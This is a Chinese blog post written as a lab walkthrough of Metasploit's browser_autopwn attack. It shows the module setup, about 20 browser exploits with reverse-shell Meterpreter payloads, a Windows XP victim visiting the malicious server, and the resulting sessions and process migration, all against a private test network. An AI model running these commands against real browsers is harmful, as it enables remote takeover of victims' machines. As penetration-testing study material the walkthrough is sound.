浏览器渗透以 browser autopwn 攻击为例
一、browser autopwn攻击
原理
二、实验环境
攻击机(服务器):kali 2019.3
靶机(受害者):winXP
三、实验步骤
1、Kali 操作
msf5 > use auxiliary/server/browser_autopwn msf5 auxiliary(server/browser_autopwn) > show options Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The IP address to use for reverse-connect payloads SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Auxiliary action: Name Description ---- ----------- WebServer Start a bunch of modules and direct clients to appropriate exploits msf5 auxiliary(server/browser_autopwn) > set srvhost 10.10.10.155 srvhost => 10.10.10.155 msf5 auxiliary(server/browser_autopwn) > set lhost 10.10.10.155 lhost => 10.10.10.155 msf5 auxiliary(server/browser_autopwn) > set URIPATH / URIPATH => / msf5 auxiliary(server/browser_autopwn) > exploit [*] Auxiliary module running as background job 0. [*] Setup msf5 auxiliary(server/browser_autopwn) > [*] Starting exploit modules on host 10.10.10.155... [*] --- [*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/qOnCM [*] Server started. [*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp [*] Using URL: http://10.10.10.155:8080/LKtM [*] Server started. [*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp [*] Using URL: http://10.10.10.155:8080/Plrmb [*] Server started. [*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp [*] Using URL: http://10.10.10.155:8080/OLrJlXl [*] Server started. [*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/DGMKpkzgl [*] Server started. [*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/vxSkgPKnuw [*] Server started. [*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/qFeUdwupePC [*] Server started. [*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/IglhJsmnNeL [*] Server started. [*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/QVlrRXkqoDlY [*] Server started. [*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/mAcrliKw [*] Server started. [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp [*] Using URL: http://10.10.10.155:8080/IgQvQD [*] Server started. [*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/kSfNK [*] Server started. [*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/mwwNxNpLenMHX [*] Server started. [*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/qgSKzGkMm [*] Server started. [*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/oUBVvezFfKcd [*] Server started. [*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/DMZgEQHCUT [*] Server started. [*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/iTUVRf [*] Server started. [*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/cGsnYd [*] Server started. [*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.155:8080/eCSchQ [*] Server started. [*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333 [*] Starting handler for generic/shell_reverse_tcp on port 6666 [*] Started reverse TCP handler on 10.10.10.155:3333 [*] Using URL: http://10.10.10.155:8080/UOaOFkJ [*] Server started. [*] Starting handler for java/meterpreter/reverse_tcp on port 7777 [*] Started reverse TCP handler on 10.10.10.155:6666 [*] Started reverse TCP handler on 10.10.10.155:7777 [*] --- Done, found 20 exploit modules [*] Using URL: http://10.10.10.155:8080/ [*] Server started.
2、受害者访问服务器
使用winXP的ie访问 http://10.10.10.155:8080/
3、Kali 效果
[*] Handling '/' [*] Handling '/?sessid=V2luZG93cyBYUDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDpTUDI6emgtY246eDg2Ok1TSUU6Ni4wOg%3d%3d' [*] JavaScript Report: Windows XP:undefined:undefined:undefined:SP2:zh-cn:x86:MSIE:6.0: [*] Responding with 14 exploits [*] 10.10.10.132 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 10.10.10.132 java_atomicreferencearray - Generated jar to drop (5304 bytes). [*] 10.10.10.132 java_jre17_jmxbean - handling request for /vxSkgPKnuw [*] 10.10.10.132 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability ………… [*] Sending stage (179779 bytes) to 10.10.10.132 [*] 10.10.10.132 java_jre17_provider_skeleton - handling request for /qFeUdwupePC [*] 10.10.10.132 java_jre17_reflection_types - handling request for /IglhJsmnNeL/ [*] 10.10.10.132 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request [*] 10.10.10.132 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution [*] 10.10.10.132 java_verifier_field_access - Generated jar to drop (5304 bytes). [*] 10.10.10.132 java_jre17_provider_skeleton - handling request for /qFeUdwupePC/ [*] Meterpreter session 1 opened (10.10.10.155:3333 -> 10.10.10.132:1203) at 2021-10-06 03:33:53 -0400 [*] Sending stage (179779 bytes) to 10.10.10.132 [*] Meterpreter session 2 opened (10.10.10.155:3333 -> 10.10.10.132:1204) at 2021-10-06 03:34:09 -0400 [*] Session ID 1 (10.10.10.155:3333 -> 10.10.10.132:1203) processing InitialAutoRunScript 'migrate -f' [!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate. [!] Example: run post/windows/manage/migrate OPTION=value [...] [*] Current server process: FTTwbkTSNceYy.exe (3724) [*] Spawning notepad.exe process to migrate to [+] Migrating to 968 [*] Session ID 2 (10.10.10.155:3333 -> 10.10.10.132:1204) processing InitialAutoRunScript 'migrate -f' [!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate. [!] Example: run post/windows/manage/migrate OPTION=value [...] [*] Current server process: unZbEFCawVoIclyNztFCwJ.exe (3732) [*] Spawning notepad.exe process to migrate to [+] Migrating to 1024 [+] Successfully migrated to process msf5 auxiliary(server/browser_autopwn) > sessions -i Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WINXP-Z9M8R8-1\z9m8r8 @ WINXP-Z9M8R8-1 10.10.10.155:3333 -> 10.10.10.132:1203 (10.10.10.132) 2 meterpreter x86/windows WINXP-Z9M8R8-1\z9m8r8 @ WINXP-Z9M8R8-1 10.10.10.155:3333 -> 10.10.10.132:1204 (10.10.10.132) msf5 auxiliary(server/browser_autopwn) > sessions -i 2 [*] Starting interaction with 2... meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x86 0 NT AUTHORITY\SYSTEM 188 664 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe 192 1484 conime.exe x86 0 WINXP-Z9M8R8-1\z9m8r8 C:\WINDOWS\system32\conime.exe 808 1508 pythonw.exe x86 0 WINXP-Z9M8R8-1\z9m8r8 C:\Python27\pythonw.exe 1508 1484 explorer.exe x86 0 WINXP-Z9M8R8-1\z9m8r8 C:\WINDOWS\Explorer.EXE ………… meterpreter > migrate 1508 [*] Migrating from 1024 to 1508... [*] Migration completed successfully. meterpreter >
4、后渗透攻击
提权,部署后门,清理痕迹等,此处不再演示,可参考该系列其他笔记
四、参考文献
《精通Metasploit渗透测试》
不忘初心,方得始终。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?